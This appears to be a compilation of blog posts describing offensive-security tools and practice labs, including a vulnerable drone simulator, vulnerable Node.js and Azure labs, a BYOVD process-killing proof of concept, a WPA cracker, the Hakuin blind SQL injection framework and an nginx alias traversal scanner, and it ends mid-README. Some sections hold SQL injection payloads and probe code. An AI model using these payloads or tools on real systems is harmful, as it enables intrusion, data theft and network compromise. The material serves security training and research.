
Damn-Vulnerable-Drone - An Intentionally Vulnerable Drone Hacking Simulator Based On The Popular ArduPilot/MAVLink Architecture, Providing A Realistic Environment For Hands-On Drone Hacking

By: Zion3R


The Damn Vulnerable Drone is an intentionally vulnerable drone hacking simulator based on the popular ArduPilot/MAVLink architecture, providing a realistic environment for hands-on drone hacking.


    About the Damn Vulnerable Drone


    What is the Damn Vulnerable Drone?

    The Damn Vulnerable Drone is a virtually simulated environment designed for offensive security professionals to safely learn and practice drone hacking techniques. It simulates real-world ArduPilot & MAVLink drone architectures and vulnerabilities, offering a hands-on experience in exploiting drone systems.

    Why was it built?

    The Damn Vulnerable Drone aims to enhance offensive security skills within a controlled environment, making it an invaluable tool for intermediate-level security professionals, pentesters, and hacking enthusiasts.

    Similar to how pilots utilize flight simulators for training, we can use the Damn Vulnerable Drone simulator to gain in-depth knowledge of real-world drone systems, understand their vulnerabilities, and learn effective methods to exploit them.

    The Damn Vulnerable Drone platform is open-source and available at no cost and was specifically designed to address the substantial expenses often linked with drone hardware, hacking tools, and maintenance. Its cost-free nature allows users to immerse themselves in drone hacking without financial concerns. This accessibility makes the Damn Vulnerable Drone a crucial resource for those in the fields of information security and penetration testing, promoting the development of offensive cybersecurity skills in a safe environment.

    How does it work?

    The Damn Vulnerable Drone platform operates on the principle of Software-in-the-Loop (SITL), a simulation technique that allows users to run drone software as if it were executing on an actual drone, thereby replicating authentic drone behaviors and responses.

    ArduPilot's SITL allows for the execution of the drone's firmware within a virtual environment, mimicking the behavior of a real drone without the need for physical hardware. This simulation is further enhanced with Gazebo, a dynamic 3D robotics simulator, which provides a realistic environment and physics engine for the drone to interact with. Together, ArduPilot's SITL and Gazebo lay the foundation for a sophisticated and authentic drone simulation experience.
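    To get a feel for this architecture, the sketch below connects to a SITL flight controller over MAVLink using pymavlink and prints a few telemetry messages. The connection string tcp:127.0.0.1:5760 is an assumption (a common SITL default); check the simulator's documentation for the actual exposed endpoint.

    # Minimal MAVLink reconnaissance sketch using pymavlink.
    # The endpoint below is an assumed SITL default; adjust to the
    # simulator's actual exposed host/port.
    from pymavlink import mavutil

    conn = mavutil.mavlink_connection('tcp:127.0.0.1:5760')
    conn.wait_heartbeat()  # block until the flight controller announces itself
    print(f'Heartbeat from system {conn.target_system}, component {conn.target_component}')

    # Read a few telemetry messages to fingerprint the drone.
    for _ in range(5):
        msg = conn.recv_match(type=['HEARTBEAT', 'SYS_STATUS', 'GLOBAL_POSITION_INT'], blocking=True)
        print(msg.get_type(), msg.to_dict())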

    While the current Damn Vulnerable Drone setup doesn't mirror every drone architecture or configuration, the integrated tactics, techniques and scenarios are broadly applicable across various drone systems, models and communication protocols.

    Features

    • Docker-based Environment: Runs in a completely virtualized docker-based setup, making it accessible and safe for drone hacking experimentation.
    • Simulated Wireless Networking: Simulated Wi-Fi (802.11) interfaces to practice wireless drone attacks.
    • Onboard Camera Streaming & Gimbal: Simulated RTSP drone onboard camera stream with gimbal and companion computer integration.
    • Companion Computer Web Interface: Companion Computer configuration management via web interface and simulated serial connection to Flight Controller.
    • QGroundControl/MAVProxy Integration: One-click QGroundControl UI launching (only supported on x86 architecture) with MAVProxy GCS integration.
    • MAVLink Router Integration: Telemetry forwarding via MAVLink Router on the Companion Computer Web Interface.
    • Dynamic Flight Logging: Fully dynamic ArduPilot flight bin logs stored on a simulated SD card.
    • Management Web Console: Simple to use simulator management web console used to trigger scenarios and drone flight states.
    • Comprehensive Hacking Scenarios: Ideal for practicing a wide range of drone hacking techniques, from basic reconnaissance to advanced exploitation.
    • Detailed Walkthroughs: If you need help hacking against a particular scenario you can leverage the detailed walkthrough documentation as a spoiler.


    VulnNodeApp - A Vulnerable Node.Js Application

    By: Zion3R


    A vulnerable application built with Node.js, the Express server, and the EJS template engine. This application is meant for educational purposes only.


    Setup

    Clone this repository

    git clone https://github.com/4auvar/VulnNodeApp.git

    Application setup:

    • Install the latest Node.js version with npm.
    • Open a terminal/command prompt and navigate to the location of the downloaded/cloned repository.
    • Run command: npm install

    DB setup

    • Install and configure the latest MySQL version and start the MySQL service/daemon
    • Log in to MySQL as the root user and run the SQL script below:
    CREATE USER 'vulnnodeapp'@'localhost' IDENTIFIED BY 'password';
    create database vuln_node_app_db;
    GRANT ALL PRIVILEGES ON vuln_node_app_db.* TO 'vulnnodeapp'@'localhost';
    USE vuln_node_app_db;
    create table users (id int AUTO_INCREMENT PRIMARY KEY, fullname varchar(255), username varchar(255),password varchar(255), email varchar(255), phone varchar(255), profilepic varchar(255));
    insert into users(fullname,username,password,email,phone) values("test1","test1","test1","test1@test.com","976543210");
    insert into users(fullname,username,password,email,phone) values("test2","test2","test2","test2@test.com","9887987541");
    insert into users(fullname,username,password,email,phone) values("test3","test3","test3","test3@test.com","9876987611");
    insert into users(fullname,username,password,email,phone) values("test4","test4","test4","test4@test.com","9123459876");
    insert into users(fullname,username,password,email,phone) values("test5","test5","test 5","test5@test.com","7893451230");

    Set basic environment variable

    • Set the following environment variables:
      • DATABASE_HOST (e.g. localhost, 127.0.0.1, etc.)
      • DATABASE_NAME (e.g. vuln_node_app_db, or the DB name you changed in the above DB script)
      • DATABASE_USER (e.g. vulnnodeapp, or the user name you changed in the above DB script)
      • DATABASE_PASS (e.g. password, or the password you changed in the above DB script)

    Start the server

    • Open the command prompt/terminal and navigate to the location of your repository
    • Run command: npm start
    • Access the application at http://localhost:3000

    Vulnerabilities covered

    • SQL Injection (see the probe sketch after this list)
    • Cross Site Scripting (XSS)
    • Insecure Direct Object Reference (IDOR)
    • Command Injection
    • Arbitrary File Retrieval
    • Regular Expression Injection
    • External XML Entity Injection (XXE)
    • Node.js Deserialization
    • Security Misconfiguration
    • Insecure Session Management
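
    To see what a probe for the first item on this list looks like in practice, here is a minimal SQL injection check against a local instance. The route (/search) and parameter (q) are hypothetical placeholders, since the README does not document the vulnerable endpoints; substitute the actual ones from the application.

    import requests

    # Hypothetical SQL injection probe against a local VulnNodeApp instance.
    # The route '/search' and parameter 'q' are illustrative placeholders.
    BASE = 'http://localhost:3000'
    payloads = ["test1", "test1' OR '1'='1"]

    for p in payloads:
        r = requests.get(f'{BASE}/search', params={'q': p})
        print(p, '->', r.status_code, len(r.text))
    # A markedly larger response for the OR-based payload suggests injection.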

    TODO

    • Add new vulnerabilities such as CORS misconfiguration, Template Injection, etc.
    • Improve application documentation

    Issues

    • In case of bugs in the application, feel free to create an issue on GitHub.

    Contribution

    • Feel free to create a pull request for any contribution.

    You can reach me at @4auvar



    XMGoat - Composed of XM Cyber terraform templates that help you learn about common Azure security issues

    By: Zion3R


    XM Goat is composed of XM Cyber terraform templates that help you learn about common Azure security issues. Each template is a vulnerable environment, with some significant misconfigurations. Your job is to attack and compromise the environments.

    Here's what to do for each environment:

    1. Run installation and then get started.

    2. With the initial user and service principal credentials, attack the environment based on the scenario flow (for example, XMGoat/scenarios/scenario_1/scenario1_flow.png).

    3. If you need help with your attack, refer to the solution (for example, XMGoat/scenarios/scenario_1/solution.md).

    4. When you're done learning the attack, clean up.


    Requirements

    • Azure tenant
    • Terraform version 1.0.9 or above
    • Azure CLI
    • Azure User with Owner permissions on Subscription and Global Admin privileges in AAD

    Installation

    Run these commands:

    $ az login
    $ git clone https://github.com/XMCyber/XMGoat.git
    $ cd XMGoat
    $ cd scenarios
    $ cd scenario_<SCENARIO>

    Where <SCENARIO> is the scenario number you want to complete

    $ terraform init
    $ terraform plan -out <FILENAME>
    $ terraform apply <FILENAME>

    Where <FILENAME> is the name of the output file

    Get started

    To get the initial user and service principal credentials, run the following query:

    $ terraform output --json

    For Service Principals, use application_id.value and application_secret.value.

    For Users, use username.value and password.value.
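
    If you prefer to grab these values programmatically, a small sketch (assuming Python, run from the scenario directory, with the output key names mentioned above):

    import json
    import subprocess

    # Read the scenario credentials from Terraform's JSON output.
    raw = subprocess.run(
        ['terraform', 'output', '-json'],
        capture_output=True, text=True, check=True,
    ).stdout
    outputs = json.loads(raw)

    print('Service principal id:    ', outputs['application_id']['value'])
    print('Service principal secret:', outputs['application_secret']['value'])
    print('Username:                ', outputs['username']['value'])
    print('Password:                ', outputs['password']['value'])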

    Cleaning up

    After completing the scenario, run the following commands in order to clean up all the resources created in your tenant:

    $ az login
    $ cd XMGoat
    $ cd scenarios
    $ cd scenario_<SCENARIO>

    Where <SCENARIO> is the scenario number you completed

    $ terraform destroy


    ROPDump - A Command-Line Tool Designed To Analyze Binary Executables For Potential Return-Oriented Programming (ROP) Gadgets, Buffer Overflow Vulnerabilities, And Memory Leaks

    By: Zion3R


    ROPDump is a tool for analyzing binary executables to identify potential Return-Oriented Programming (ROP) gadgets, as well as detecting potential buffer overflow and memory leak vulnerabilities.


    Features

    • Identifies potential ROP gadgets in binary executables.
    • Detects potential buffer overflow vulnerabilities by analyzing vulnerable functions.
    • Generates exploit templates to speed up the exploitation process.
    • Identifies potential memory leak vulnerabilities by analyzing memory allocation functions.
    • Can print function names and addresses for further analysis.
    • Supports searching for specific instruction patterns.

    Usage

    • <binary>: Path to the binary file for analysis.
    • -s, --search SEARCH: Optional. Search for specific instruction patterns.
    • -f, --functions: Optional. Print function names and addresses.

    Examples

    • Analyze a binary without searching for specific instructions:

    python3 ropdump.py /path/to/binary

    • Analyze a binary and search for specific instructions:

    python3 ropdump.py /path/to/binary -s "pop eax"

    • Analyze a binary and print function names and addresses:

    python3 ropdump.py /path/to/binary -f



    Reaper - Proof Of Concept On BYOVD Attack

    By: Zion3R


    Reaper is a proof-of-concept designed to exploit a BYOVD (Bring Your Own Vulnerable Driver) vulnerability. This malicious technique involves inserting a legitimate, vulnerable driver into a target system, which allows attackers to exploit the driver to perform malicious actions.

    Reaper was specifically designed to exploit the vulnerability present in version 2.8.0.0 of the kprocesshacker.sys driver, taking advantage of its weaknesses to gain privileged access and control over the target system.

    Note: Reaper does not kill the Windows Defender process, as that process is protected; Reaper is a simple proof of concept.


    Features

    • Kill process
    • Suspend process

    Help

          ____
    / __ \___ ____ _____ ___ _____
    / /_/ / _ \/ __ `/ __ \/ _ \/ ___/
    / _, _/ __/ /_/ / /_/ / __/ /
    /_/ |_|\___/\__,_/ .___/\___/_/
    /_/

    [Coded by MrEmpy]
    [v1.0]

    Usage: C:\Windows\Temp\Reaper.exe [OPTIONS] [VALUES]
    Options:
    sp, suspend process
    kp, kill process

    Values:
    PROCESSID process id to suspend/kill

    Examples:
    Reaper.exe sp 1337
    Reaper.exe kp 1337


    Install

    You can compile it directly from the source code or download it already compiled. You will need Visual Studio 2022 to compile.

    Note: The executable and driver must be in the same directory.



    Pyrit - The Famous WPA Precomputed Cracker

    By: Zion3R


    Pyrit allows you to create massive databases, pre-computing the WPA/WPA2-PSK authentication phase in a space-time trade-off. By using the computational power of multi-core CPUs and other platforms through ATI-Stream, Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security protocols.

    WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre-shared key. This master key is derived from a password which the administrating user has to pre-configure, e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate subsequent traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home and small-office use, at the cost of making the protocol vulnerable to brute-force attacks against its key negotiation phase; these ultimately allow an attacker to reveal the password that protects the network. This vulnerability has to be considered exceptionally disastrous, as the protocol allows much of the key derivation to be pre-computed, making simple brute-force attacks even more alluring to the attacker. For more background see this article on the project's blog (outdated).


    The author does not encourage or support using Pyrit for the infringement of peoples' communication privacy. The exploration and realization of the technology discussed here are a purpose of their own; this is documented by the open development, strictly source-code-based distribution and 'copyleft' licensing.

    Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms, including FreeBSD, MacOS X and Linux as operating systems, and on x86-, alpha-, arm-, hppa-, mips-, powerpc-, s390 and sparc-processors.

    Attacking WPA/WPA2 by brute force boils down to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10,000 PMKs per second is equivalent to hashing 9.8 gigabytes of data with SHA-1 in one second.
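
    For reference, a single PMK computation is straightforward to express; a minimal sketch in Python, assuming the standard WPA parameters (passphrase and ESSID as PBKDF2 inputs, 4096 iterations, 32 output bytes):

    import hashlib

    # PMK = PBKDF2-HMAC-SHA1(passphrase, essid, 4096 iterations, 32 bytes)
    def wpa_pmk(passphrase: str, essid: str) -> bytes:
        return hashlib.pbkdf2_hmac('sha1', passphrase.encode(), essid.encode(), 4096, 32)

    print(wpa_pmk('password123', 'MyHomeWifi').hex())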

    These are examples of how multiple computational nodes can access a single storage server in various ways provided by Pyrit:

    • A single storage (e.g. a MySQL-server)
    • A local network that can access the storage server directly, providing four computational nodes on various levels with only one node actually accessing the storage server itself.
    • Another, untrusted network that accesses the storage through Pyrit's RPC interface and provides three computational nodes, two of which actually access the RPC interface.

    What's new

    • Fixed #479 and #481
    • Pyrit CUDA now compiles in OSX with Toolkit 7.5
    • Added use_CUDA and use_OpenCL in config file
    • Improved cores listing and managing
    • limit_ncpus now disables all CPUs when set to value <= 0
    • Improve CCMP packet identification, thanks to yannayl

    See CHANGELOG file for a better description.

    How to use

    Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.

    How to participate

    You may want to read this wiki entry if you are interested in porting Pyrit to a new hardware platform. For contributions or bug reports, submit an issue at https://github.com/JPaulMora/Pyrit/issues.



    Hakuin - A Blazing Fast Blind SQL Injection Optimization And Automation Framework

    By: Zion3R


    Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.

    Hakuin has been presented at esteemed academic and industrial conferences:

    • BlackHat MEA, Riyadh, 2023
    • Hack in the Box, Phuket, 2023
    • IEEE S&P Workshop on Offensive Technology (WOOT), 2023

    More information can be found in our paper and slides.


    Installation

    To install Hakuin, simply run:

    pip3 install hakuin

    Developers should install the package locally and set the -e flag for editable mode:

    git clone git@github.com:pruzko/hakuin.git
    cd hakuin
    pip3 install -e .

    Examples

    Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from Requester and override the request method. The method must also determine whether the query resolved to True or False.

    Example 1 - Query Parameter Injection with Status-based Inference
    import aiohttp
    from hakuin import Requester

    class StatusRequester(Requester):
        async def request(self, ctx, query):
            r = await aiohttp.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
            return r.status == 200
    Example 2 - Header Injection with Content-based Inference
    class ContentRequester(Requester):
        async def request(self, ctx, query):
            headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
            r = await aiohttp.get(f'http://vuln.com/', headers=headers)
            return 'found' in await r.text()

    To start extracting data, use the Extractor class. It requires a DBMS object to construct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.

    Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL
    import asyncio
    from hakuin import Extractor, Requester
    from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL

    class StatusRequester(Requester):
        ...

    async def main():
        # requester: Use this Requester
        # dbms: Use this DBMS
        # n_tasks: Spawns N tasks that extract column rows in parallel
        ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
        ...

    if __name__ == '__main__':
        asyncio.get_event_loop().run_until_complete(main())

    Now that everything is set, you can start extracting DB metadata.

    Example 1 - Extracting DB Schemas
    # strategy:
    # 'binary': Use binary search
    # 'model': Use pre-trained model
    schema_names = await ext.extract_schema_names(strategy='model')
    Example 2 - Extracting Tables
    tables = await ext.extract_table_names(strategy='model')
    Example 3 - Extracting Columns
    columns = await ext.extract_column_names(table='users', strategy='model')
    Example 4 - Extracting Tables and Columns Together
    metadata = await ext.extract_meta(strategy='model')

    Once you know the structure, you can extract the actual content.

    Example 1 - Extracting Generic Columns
    # text_strategy:    Use this strategy if the column is text
    res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
    Example 2 - Extracting Textual Columns
    # strategy:
    # 'binary': Use binary search
    # 'fivegram': Use five-gram model
    # 'unigram': Use unigram model
    # 'dynamic': Dynamically identify the best strategy. This setting
    # also enables opportunistic guessing.
    res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
    Example 3 - Extracting Integer Columns
    res = await ext.extract_column_int(table='users', column='id')
    Example 4 - Extracting Float Columns
    res = await ext.extract_column_float(table='products', column='price')
    Example 5 - Extracting Blob (Binary Data) Columns
    res = await ext.extract_column_blob(table='users', column='id')

    More examples can be found in the tests directory.

    Using Hakuin from the Command Line

    Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:

    python3 hk.py -h

    For Researchers

    This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

    Cite Hakuin

    @inproceedings{hakuin_bsqli,
    title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
    author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
    booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
    pages={384--393},
    year={2023},
    organization={IEEE}
    }


    Ioctlance - A Tool That Is Used To Hunt Vulnerabilities In X64 WDM Drivers

    By: Zion3R

    Description

    Presented at CODE BLUE 2023, this project, titled Enhanced Vulnerability Hunting in WDM Drivers with Symbolic Execution and Taint Analysis, introduces IOCTLance, a tool that enhances the capacity to detect various vulnerability types in Windows Driver Model (WDM) drivers. In a comprehensive evaluation involving 104 known vulnerable WDM drivers and 328 unknown ones, IOCTLance successfully unveiled 117 previously unidentified vulnerabilities within 26 distinct drivers. As a result, 41 CVEs were reported, encompassing 25 cases of denial of service, 5 instances of insufficient access control, and 11 examples of elevation of privilege.


    Features

    Target Vulnerability Types

    • map physical memory
    • controllable process handle
    • buffer overflow
    • null pointer dereference
    • read/write controllable address
    • arbitrary shellcode execution
    • arbitrary wrmsr
    • arbitrary out
    • dangerous file operation

    Optional Customizations

    • length limit
    • loop bound
    • total timeout
    • IoControlCode timeout
    • recursion
    • symbolize data section

    Build

    Docker (Recommended)

    docker build .

    Local

    dpkg --add-architecture i386
    apt-get update
    apt-get install git build-essential python3 python3-pip python3-dev htop vim sudo \
    openjdk-8-jdk zlib1g:i386 libtinfo5:i386 libstdc++6:i386 libgcc1:i386 \
    libc6:i386 libssl-dev nasm binutils-multiarch qtdeclarative5-dev libpixman-1-dev \
    libglib2.0-dev debian-archive-keyring debootstrap libtool libreadline-dev cmake \
    libffi-dev libxslt1-dev libxml2-dev

    pip install angr==9.2.18 ipython==8.5.0 ipdb==0.13.9

    Analysis

    # python3 analysis/ioctlance.py -h
    usage: ioctlance.py [-h] [-i IOCTLCODE] [-T TOTAL_TIMEOUT] [-t TIMEOUT] [-l LENGTH] [-b BOUND]
    [-g GLOBAL_VAR] [-a ADDRESS] [-e EXCLUDE] [-o] [-r] [-c] [-d]
    path

    positional arguments:
    path dir (including subdirectory) or file path to the driver(s) to analyze

    optional arguments:
    -h, --help show this help message and exit
    -i IOCTLCODE, --ioctlcode IOCTLCODE
    analyze specified IoControlCode (e.g. 22201c)
    -T TOTAL_TIMEOUT, --total_timeout TOTAL_TIMEOUT
    total timeout for the whole symbolic execution (default 1200, 0 to unlimited)
    -t TIMEOUT, --timeout TIMEOUT
    timeout for analyzing each IoControlCode (default 40, 0 to unlimited)
    -l LENGTH, --length LENGTH
    the limit on the number of instructions for technique LengthLimiter (default 0, 0
    to unlimited)
    -b BOUND, --bound BOUND
    the bound for technique LoopSeer (default 0, 0 to unlimited)
    -g GLOBAL_VAR, --global_var GLOBAL_VAR
    symbolize how many bytes in .data section (default 0 hex)
    -a ADDRESS, --address ADDRESS
    address of ioctl handler to directly start hunting with blank state (e.g.
    140005c20)
    -e EXCLUDE, --exclude EXCLUDE
    exclude function address split with , (e.g. 140005c20,140006c20)
    -o, --overwrite overwrite x.sys.json if x.sys has been analyzed (default False)
    -r, --recursion do not kill state if detecting recursion (default False)
    -c, --complete get complete base state (default False)
    -d, --debug print debug info while analyzing (default False)

    Evaluation

    # python3 evaluation/statistics.py -h
    usage: statistics.py [-h] [-w] path

    positional arguments:
    path target dir or file path

    optional arguments:
    -h, --help show this help message and exit
    -w, --wdm copy the wdm drivers into <path>/wdm

    Test

    1. Compile the testing examples in test to generate testing driver files.
    2. Run IOCTLance against the driver files.




    Navgix - A Multi-Threaded Golang Tool That Will Check For Nginx Alias Traversal Vulnerabilities

    By: Zion3R


    navgix is a multi-threaded Golang tool that checks for nginx alias traversal vulnerabilities.


    Techniques

    Currently, navgix supports two techniques for finding vulnerable directories (or location aliases), described below:

    Heuristics

    navgix will make an initial GET request to the page, and if there are any directories specified in the page HTML (in src attributes of HTML elements), it will test each folder in the path for the vulnerability. For example, if it finds a link to /static/img/photos/avatar.png, it will test /static/, /static/img/ and /static/img/photos/.
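
    Here is a minimal Python sketch of that per-prefix alias traversal check (navgix itself is written in Go; the /static../ probe pattern reflects the classic nginx alias misconfiguration, and the response heuristics below are assumptions):

    import requests

    # Probe a candidate prefix for nginx alias traversal: for '/static/',
    # request '/static../'. If the location block uses `alias` without a
    # trailing slash, the probe may escape into the parent directory.
    def check_alias_traversal(base: str, prefix: str) -> bool:
        probe = prefix.rstrip('/') + '../'
        r = requests.get(base + probe, allow_redirects=False, timeout=10)
        # 2xx (or a redirect into the aliased tree) hints at traversal;
        # patched servers normally answer 403/404.
        return r.status_code in (200, 301)

    print(check_alias_traversal('http://target.example', '/static/'))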

    Brute-force

    navgix will also test a short list of directories that commonly have this vulnerability, and if any of these directories exist, it will also attempt to confirm whether a vulnerability is present.

    Installation

    git clone https://github.com/Hakai-Offsec/navgix; cd navgix;
    go build




    Raven - CI/CD Security Analyzer

    By: Zion3R


    RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.

    With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub. We listed all vulnerabilities discovered using Raven in the tool's Hall of Fame.


    What is Raven

    The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:

    • Downloader: You can download workflows and actions necessary for analysis. Workflows can be downloaded for a specified organization or for all repositories, sorted by star count. Performing this step is a prerequisite for analyzing the workflows.
    • Indexer: Digesting the downloaded data into a graph-based Neo4j database. This process involves establishing relationships between workflows, actions, jobs, steps, etc.
    • Query Library: We created a library of pre-defined queries based on research conducted by the community.
    • Reporter: Raven has a simple way of reporting suspicious findings. As an example, it can be incorporated into the CI process for pull requests and run there.

    Possible usages for Raven:

    • Scanner for your own organization's security
    • Scanning specified organizations for bug bounty purposes
    • Scan everything and report issues found to save the internet
    • Research and learning purposes

    This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.

    Why Raven

    In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear โ€“ the model in which security is delegated to developers has failed. This has been proven several times in our previous content:

    • A simple injection scenario exposed dozens of public repositories, including popular open-source projects.
    • We found that one of the most popular frontend frameworks was vulnerable to the innovative method of branch injection attack.
    • We detailed a completely different attack vector, third-party integration risks, affecting the most popular project on GitHub and thousands more.
    • Finally, the Microsoft 365 UI framework, with more than 300 million users, is vulnerable to an additional new threat โ€“ an artifact poisoning attack.
    • Additionally, we found, reported, and disclosed hundreds of other vulnerabilities privately.

    Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality โ€“ each exploitation can impact millions of victims.

    It was for these reasons that Raven was created: a framework for CI/CD security analysis of workflows (with GitHub Actions as the first use case). In our focus, we examined complex scenarios where each issue isn't a threat on its own, but when combined, they pose a severe threat.

    Setup && Run

    To get started with Raven, follow these installation instructions:

    Step 1: Install the Raven package

    pip3 install raven-cycode

    Step 2: Setup a local Redis server and Neo4j database

    docker run -d --name raven-neo4j -p7474:7474 -p7687:7687 --env NEO4J_AUTH=neo4j/123456789 --volume raven-neo4j:/data neo4j:5.12
    docker run -d --name raven-redis -p6379:6379 --volume raven-redis:/data redis:7.2.1

    Another way to set up the environment is by running our provided docker compose file:

    git clone https://github.com/CycodeLabs/raven.git
    cd raven
    make setup

    Step 3: Run Raven Downloader

    Org mode:

    raven download org --token $GITHUB_TOKEN --org-name RavenDemo

    Crawl mode:

    raven download crawl --token $GITHUB_TOKEN --min-stars 1000

    Step 4: Run Raven Indexer

    raven index

    Step 5: Inspect the results through the reporter

    raven report --format raw

    At this point, it is possible to inspect the data in the Neo4j database by connecting to http://localhost:7474/browser/.
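
    The same data can be queried programmatically; a minimal sketch with the official neo4j Python driver, using the default credentials from the setup step above (the aggregate query avoids assuming specific node labels):

    from neo4j import GraphDatabase

    # Connect with the defaults used in the setup step above.
    driver = GraphDatabase.driver('neo4j://localhost:7687', auth=('neo4j', '123456789'))
    with driver.session() as session:
        # Count indexed nodes per label to get a feel for the graph.
        result = session.run('MATCH (n) RETURN labels(n) AS labels, count(*) AS c ORDER BY c DESC')
        for record in result:
            print(record['labels'], record['c'])
    driver.close()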

    Prerequisites

    • Python 3.9+
    • Docker Compose v2.1.0+
    • Docker Engine v1.13.0+

    Infrastructure

    Raven uses two primary Docker containers: Redis and Neo4j. make setup will run a docker compose command to prepare that environment.

    Usage

    The tool provides three main functions: download, index, and report.

    Download

    Download Organization Repositories

    usage: raven download org [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] --org-name ORG_NAME

    options:
    -h, --help show this help message and exit
    --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
    --debug Whether to print debug statements, default: False
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --org-name ORG_NAME Organization name to download the workflows

    Download Public Repositories

    usage: raven download crawl [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--max-stars MAX_STARS] [--min-stars MIN_STARS]

    options:
    -h, --help show this help message and exit
    --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
    --debug Whether to print debug statements, default: False
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --max-stars MAX_STARS
    Maximum number of stars for a repository
    --min-stars MIN_STARS
    Minimum number of stars for a repository, default: 1000

    Index

    usage: raven index [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS]
    [--clean-neo4j] [--debug]

    options:
    -h, --help show this help message and exit
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --neo4j-uri NEO4J_URI
    Neo4j URI endpoint, default: neo4j://localhost:7687
    --neo4j-user NEO4J_USER
    Neo4j username, default: neo4j
    --neo4j-pass NEO4J_PASS
    Neo4j password, default: 123456789
    --clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
    --debug Whether to print debug statements, default: False

    Report

    usage: raven report [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI]
    [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j]
    [--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}]
    [--severity {info,low,medium,high,critical}] [--queries-path QUERIES_PATH] [--format {raw,json}]
    {slack} ...

    positional arguments:
    {slack}
    slack Send report to slack channel

    options:
    -h, --help show this help message and exit
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --neo4j-uri NEO4J_URI
    Neo4j URI endpoint, default: neo4j://localhost:7687
    --neo4j-user NEO4J_USER
    Neo4j username, default: neo4j
    --neo4j-pass NEO4J_PASS
    Neo4j password, default: 123456789
    --clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
    --tag {injection,unauthenticated,fixed,priv-esc,supply-chain}, -t {injection,unauthenticated,fixed,priv-esc,supply-chain}
    Filter queries with specific tag
    --severity {info,low,medium,high,critical}, -s {info,low,medium,high,critical}
    Filter queries by severity level (default: info)
    --queries-path QUERIES_PATH, -dp QUERIES_PATH
    Queries folder (default: library)
    --format {raw,json}, -f {raw,json}
    Report format (default: raw)

    Examples

    Retrieve all workflows and actions associated with the organization.

    raven download org --token $GITHUB_TOKEN --org-name microsoft --org-name google --debug

    Scrape all publicly accessible GitHub repositories.

    raven download crawl --token $GITHUB_TOKEN --min-stars 100 --max-stars 1000 --debug

    After finishing the download process or if interrupted using Ctrl+C, proceed to index all workflows and actions into the Neo4j database.

    raven index --debug

    Now, we can generate a report using our query library.

